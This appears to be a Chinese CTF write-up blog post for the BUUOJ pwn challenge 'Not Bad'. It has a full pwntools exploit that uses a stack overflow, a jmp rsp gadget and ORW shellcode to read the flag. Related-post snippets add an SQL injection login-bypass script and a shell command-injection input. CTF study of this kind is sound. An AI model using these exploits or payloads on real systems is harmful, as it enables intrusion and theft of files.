buuoj刷题记录 - [极客大挑战 2019]Not Bad

最新推荐文章于 2025-03-29 15:54:59 发布
最新推荐文章于 2025-03-29 15:54:59 发布
阅读量415 收藏 1
点赞数
分类专栏: pwn入门 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_34010404/article/details/123809796
版权

检查一下保护:
在这里插入图片描述
在这里插入图片描述

程序很简单,存在栈溢出漏洞,只能溢出16个字节。
只允许orw系统调用.

前八个字节用来jmp rsp ,紧接着加上5个字节近转移 call到buff的开始处执行.

在这里插入图片描述
这样就可以往buf里面写gadget来往指定地址处读入shellcode
之后跳转到shellcode把flag读出来

exp:

from pwn import*

#sh = process('./pwn')
sh = remote('node4.buuoj.cn',29515)
context.arch= 'x86_64'

shellcode = 0x123000
flag = 0x0601100		#找一个位置保存flag
orw = '''
mov rax, 0x67616c662f
push rax
mov rdi,rsp
xor rsi,rsi
mov rax,0x2
syscall

mov rdi,rax
mov rsi,0x0601100
mov rdx,0x100
xor rax,rax
syscall

mov rdi,1
mov rsi,0x0601100
mov rdx,0x30
mov rax,1
syscall
hlt
'''
jmp_rsp = 0x400A01
#
gadget = '''
mov rdi,0
mov rsi,0x123000
mov rdx,0x1000
xor rax,rax
syscall 
jmp rsi 
'''
#ffffffd0
payload = asm(gadget).ljust(32,b'\x00') + p64(0) + p64(jmp_rsp) + b'\xE8\xcb\xff\xff\xff' 	#call 硬编码E8,后面加上四个字节的偏移(目标指令 - 下一条指令地址)
sh.sendafter(b'Easy shellcode, have fun!',payload)
#gdb.attach(sh)
sh.sendafter(b'Baddd! Focu5 me! Baddd! Baddd!',asm(orw))
sh.interactive()

成功拿到flag:
在这里插入图片描述

【pwn】 [极客挑战 2019]Not Bad
Nothing
03-10 1199
例行检查 开了沙箱 程序逻辑很简单,存在0x18字节溢出,看是否能进行栈迁移,目前可控输入只有buf,但是buf只有0x20小不够rop,所以尝试别的方法。程序在最开始mmap了一块内存,可写可执行,那么接下来目标就是1.在这块内存上写shellcode 2.跳转过来执行 由于不能rop且栈是可执行的想到能不能进行jmp rsp。在程序中找到了这个指令。 那么就可以在buf上布置read以...
BUUCTF-PWN题记-8
weixin_44145820的博客
04-16 994
roarctf_2019_realloc_magic roarctf_2019_realloc_magic
BUUCTF之“[极客挑战 2019]Not Bad 1
Probeginner的博客
12-16 285
简单orw
BUUCTF [极客挑战 2019]Not Bad
最新发布
2401_85052854的博客
03-29 496
我们直接open根目下的flag,然后把flag的内容读入到mmap中,再用write打印处mmap的值,这里解释一下为什么fd为3,因为我们是打开文件进行读入,0,1,2分别是标准输出,标准输入,标准错误,所以3之后才是打开文件的顺序,所以我们写上3.以下是完整的exp。在main看到这两个比较有用的函数,第一个函数一眼看过去就发现是有沙箱保护的,第二个函数就是正常的栈溢出函数,我们先看看程序开了什么保护。也是第一次做到沙箱的题,也熟练了一点orw的攻击方式。拿到题目放入ida,看看有什么函数。
[极客挑战 2019]Not Bad
qq_43766802的博客
09-28 600
检查下程序的保护措施 拖入ida发现程序打开了沙盒保护,随即用seccomp-tools工具查看下白名单 因此这题选择用orw来get flag 函数允许我们输入0x38个字节,但buf只有0x20小,并且只能溢出0x18个字节,用buf来装orw的汇编代码是绝对不够的,但程序一开始mmap了内存中的一段区域,我们可以利用这段区域来保存我们的shellcode,并发现该程序有jmp rsp,利用jmp rsp可以直接执行栈上的内容 write up from pwn import..
极客挑战_2019_Not_Bad
z1r0的博客
01-17 2945
极客挑战_2019_Not_Bad shellcode题目 mmap了一块空间,加了沙盒来个orw。 可以考虑栈迁移,但是既然可以shellcode,那就看一下怎么使用 前面mmap了一块,可以将shellcode写到mmap那里,然后借助gadget跳到mmap去执行。 刚好有一个jmp rsp这个跳板,思路就是使用jmp rsp这个跳板跳到buf头中被写入的payload。再用shellcraft.read(0, mmap, 0x100) mov rax,0x123000;call rax这两
[BUUCTF]PWN——[极客挑战 2019]Not Bad (orw_shellcode)
mcmuyanga的博客
01-30 2783
[极客挑战 2019]Not Bad 附件 步骤
buuctf.web 32-64
m0_73889365的博客
02-18 908
buuctf.web
[BUUCTF]PWN——[极客挑战 2019]Not Bad详细解释
weixin_46521144的博客
03-25 977
从这道题可以学到shellcode的一般使用方法,和orw的一般方法 这道题开启了secure computing mood 使用seccomp看到可以使用的函数 使用vmmap查看哪里可以写shellcode IDA中也有看到使用vmmap开启了一段内存 这里mmap参数类型是(起始地址,小,保护类,文件描述符等) 我们只需要关注保护类权限 PROT_READ是0x1 PROT_WRITE是0x2 PROT_EXEC是0x4 也就是read,write,execute的顺序,那么这里是6,也就是
[BUUCTF-pwn]——[极客挑战 2019]Not Bad(ORW)(内涵peak小知识)
Y_peak的博客
03-31 575
[BUUCTF-pwn]——[极客挑战 2019]Not Bad 又是一道收获满满的题目. peak小知识 seccomp: seccomp是一种内核中的安全机制,正常情况下,程序可以使用所有的syscall,这是不安全的,比如程序劫持程序流后通过execve的syscall来getshell。所以可以通过seccomp_init、seccomp_rule_add、seccomp_load配合来ban掉一些系统调用. seccomp-tools: 沙盒工具, 可以查看那些系统调用可以被使用, 安装在我的
BUUOJ-Web-题记
x0r
09-01 445
为提升观感体验,本篇博文长期更新,新题目以二次编辑形式附在最后 [ACTF2020 新生赛]Exec 打开后发现网页是关于执行一个ping指令,经过测试是直接执行的,所以就直接命令执行了 127.0.0.1 | cat /flag 总结一下常见的Linux管道符 |按位或,直接执行|后面的语句 ||逻辑或,如果前面命令是错的那么就执行后面的语句,否则只执行前面的语句 &按位与,&a...
buuoj题记2
臭nana的博客
06-11 330
[GYCTF2020]Ezsqli 首先从题目名字就能知道这是道SQL注入题 打开题目测一下,输入1打印Nu1L,输入2打印V&N,其他的数字是报没有查询结果的错 加个单引号试试,显示bool(false) 布尔盲注 import requests url = "http://0a02ac5a-9801-4b63-a153-6d331955650d.node3.buuoj.cn/index.php" database = "" key='' for i in range(1
buuoj题记 - babyfengshui_33c3_2016
qq_34010404的博客
03-16 211
检查程序保护: 拖进IDA看一下,add,show,edit,free 有一个全局的数组,每一个元素是一个地址,执行一个User结构体。 分析一下可以知道User结构体概是这样子: struct User { char* szUserDescription; char szUserName[124]; } add函数: add函数调用了readDescription函数: 其中存在问题的就位于该函数内,该函数在Update内被会被调用. add函数内需要注意的一个地方,就是readDescrip
buuoj题记 - npuctf_2020_easyheap
qq_34010404的博客
03-26 240
题目给了add,show,edit,del函数 问题在edit函数里面,重新编辑的时候可以溢出一个字节 看一下create函数,只能分配小为 24,和56的空间 思路:覆盖下一个chunk的chunksize低字节达到修改chunk的小,free 的时候会放到更的tcache bin里面,之后malloc的时候会造成chunk重叠. 下面是我的构造方法: 把利用 0 把1中chunk2的size 改掉,改成0x40, (一会malloc的时候用到,注意只能分配小为 56 和 24 的空间,(8.
buuoj题笔记
q1415500189的博客
01-22 1034
buuoj
buuoj题记 - ciscn_2019_final_3
qq_34010404的博客
03-25 518
看了佬们的思路才做出来的,这里只记一下做题中踩的坑。 1.add函数 2.del函数 free后没有把数组元素标记为0,存在UAF漏洞. 思路是:1.double free 改fd 到 另一个chunk 的首地址处,然后修改chunksize ,原因是程序限制了分配小为120字节,free到unsorted bin里面。 2.free chunk 到unsorted bin里面 3.double free 修改fd 到第二步中的chunk,之后便可以malloc 到unsorted bin处,然后
[极客挑战 2019]Not Bad的另一种思路
chennbnbnb的博客
10-22 339
保护 漏洞 算上rbp只有0x20的溢出空间 思路1 利用jmp rsp的GG执行栈上的shellcode,这个思路用的人很多,就不再说了 思路2:不使用jmp rsp 如果需要开启shellcode,最常用的就是ret到shellcode的地址,为了获取shellcode地址,那么就有了两个选择 泄露栈地址,做不到 栈迁移到一个已知位置 通过leave指令使得rbp = 已知空间buf之后,需要在0x18长度内完成两件事情 向buf中写入exp leave+ret让rsp迁
BUU题记
as you know, nlp is fantasitc!
08-10 496
这个文章的知识点包括 sql注入中的异或盲注、preg_match的绕过(%0a绕过,prce限制)、basename去掉ascii码字符的情况。
Buuctf-Web-[极客挑战 2019]EasySQL1 代码
12-28
### Buuctf Web 极客挑战 2019 EasySQL1 解题代码 对于Buuctf Web中的极客挑战2019之EasySQL1,由于该题目存在未对输入参数进行适当过滤的情况,可以利用这一特性通过SQL注入的方式完成解题。下面展示的是基于此逻辑构建的攻击向量实现方式。 #### 使用Python脚本模拟请求并获取Flag ```python import requests url = "http://example.com/login" # 替换成实际地址 payload = { 'username': "' OR '1'='1", 'password': "' OR '1'='1" } response = requests.post(url, data=payload) if "flag{" in response.text: start_index = response.text.find("flag{") end_index = response.text.find('}', start_index) + 1 flag = response.text[start_index:end_index] print(f"The obtained flag is: {flag}") else: print("Failed to obtain the flag.") ``` 上述代码展示了如何构造一个简单的POST请求来发送含有SQL注入语句的数据包给目标网站,并从中提取返回页面内的`flag`字符串[^1]。 需要注意的是,在真实环境中应当合法合规地参与CTF竞赛活动,不得用于非法目的或损害他人利益的行为上。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Suspend.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值